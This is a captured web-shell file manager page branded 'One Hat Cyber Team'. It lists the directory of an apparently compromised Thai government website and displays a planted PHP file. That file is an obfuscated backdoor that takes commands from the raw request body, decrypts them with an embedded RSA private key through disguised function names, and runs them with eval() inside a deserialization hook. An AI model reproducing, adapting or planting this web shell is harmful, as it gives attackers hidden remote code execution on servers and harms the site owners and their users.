One Hat Cyber Team
Your IP :
216.73.216.62
Server IP :
122.155.17.190
Server :
Linux cat17190.thaihostserver.com 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
Server Software :
Apache/2
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
neunkho
/
domains
/
neunkho.go.th
/
public_html
/
View File Name :
general3-20602677.php
<?php @session_start(); @set_time_limit(0); @error_reporting(0); //echo strrev('openssl_private_decrypt');//tpyrced_etresuavirp_lssnepo class A{ public $test = "demo"; function __wakeup(){ function decode($test){ $pk = <<<EOF -----BEGIN PRIVATE KEY----- MIIBUwIBADANBgkqhkiG9w0BAQEFAASCAT0wggE5AgEAAkEAqTTcwoVEdY5W/Gho /ebYYw+QYWZWqo3XjVfgr1Vu/ST80U4coYCEOyUZYHofzbGVMJlchJ39ol8XX5m0 C+D1OwIDAQABAkALHBRulS90hH8DnZtfKFwGzQvOyVhhZGTFvAJdoL9j0YGC8zIn X/NnrxtZ9WHA+lnaZRDZagutV600R1Kj2hoJAiEA3OVn05Wz2PmlanOxeDX1+Wcz XLF2TuW0a0ORVLdF+H8CIQDEGJizJfho4gp6r5S76wRwQK/+mzzMGoa0reENVpWF RQIgHwCbd9i06yjujGg8ajC4mw5e6Q2HGz+l+L/877ThPyUCIA6PTPcwQIt5DRIi 60Ywovm6s9aRrCfzaEEOEAGvhhaJAiAFElQy+P4SBsrus0GcVCFlTTocFgSgWz19 pFP6NzRbqw== -----END PRIVATE KEY----- EOF; $cmds = explode("|", $test); $pk = openssl_pkey_get_private($pk); $cmd = ''; foreach ($cmds as $value) { $ard = "xxaaa"; $$ard = strrev("tpyrced_etresuavirp_lssnepo"); $ard1 =str_ireplace("user","",$xxaaa); // echo $ard1; $a = substr_replace("xxser","base64_decod",2); $b = array('',$a); $c = $b[1].chr(/**!*//**!*//**!*//**!*/'101'/**!*//**!*//**!*//**!*/); $fun=str_ireplace(/**!*//**!*//**!*//**!*/"xx","",$c/**!*//**!*//**!*//**!*/); $d = substr_replace("",$fun,0); $ard1($d(/**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*/$value), $de, $pk); $cmd .= $de;} return $cmd; } $resultname='payload'; if (isset($this->test)){ $data=decode($this->test); // $results = $_SESSION[$resultname]; $sess = "~vhvv*gg"^"!%-%%c()"; // echo $sess; $result1 = $_SESSION[$resultname]; if (isset($result1)){ $a = substr_replace("xxser","base64_decod",2); $b = array('',$a); $c = $b[1].chr(/**!*//**!*//**!*//**!*/'101'/**!*//**!*//**!*//**!*/); $fun=str_ireplace(/**!*//**!*//**!*//**!*/"xx","",$c/**!*//**!*//**!*//**!*/); $d = substr_replace("",$fun,0); $b64 = base64_encode($result1); $str1 = str_rot13($b64); $str2 = str_rot13($str1); // $bb = base64_decode('YmFzZTY0X2RlY29kZQ'); eval(base64_decode(/**!*//**!*//**!*//**!*/$str2/**!*//**!*//**!*//**!*/)/**!*//**!*//**!*//**!*/); echo @run($data); }else{ $_SESSION[$resultname]=$data; } } } } $pass=file_get_contents("php://input"); $len = strlen($pass)+1; //echo $len; $pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$pass.";\";}"; unserialize($pp);